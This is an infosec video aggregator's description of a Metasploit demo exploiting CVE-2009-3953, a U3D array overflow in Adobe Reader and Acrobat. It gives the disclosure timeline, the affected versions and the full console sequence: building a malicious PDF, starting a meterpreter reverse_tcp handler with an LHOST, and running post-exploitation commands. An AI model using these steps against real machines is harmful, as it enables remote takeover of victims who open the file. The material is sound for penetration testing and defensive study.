Description: Timeline :
Vulnerability provided to Secunia by Felipe Andres Manzano for versions prior to 9.2
Vulnerability provided to Secunia by Parvez Anwar for version 9.2
Vulnerabilities provided by Secunia to the vendor
Metasploit PoC provided by duck the 2009-11-25
Coordinated advisory release the 2010-01-12 !
PoC provided by:
Felipe Andres Manzano
jduck
Reference(s) :
CVE-2009-3953
Affected versions :
Adobe Reader and Acrobat Professional prior to version 9.3
Acrobat prior to version 8.2
Tested on Windows XP SP3 with Adobe Reader 9.0.0
Description :
This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include prior to 7.1.4, prior to 8.2, and prior to 9.3. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.
Metasploit demo :
use exploit/windows/fileformat/adobe_u3d_meshdecl
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sessions -i 1
sysinfo
getuid
ipconfig
Owned !
Tags: metasploit , windows , microsoft , adobe , acrobat , reader , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.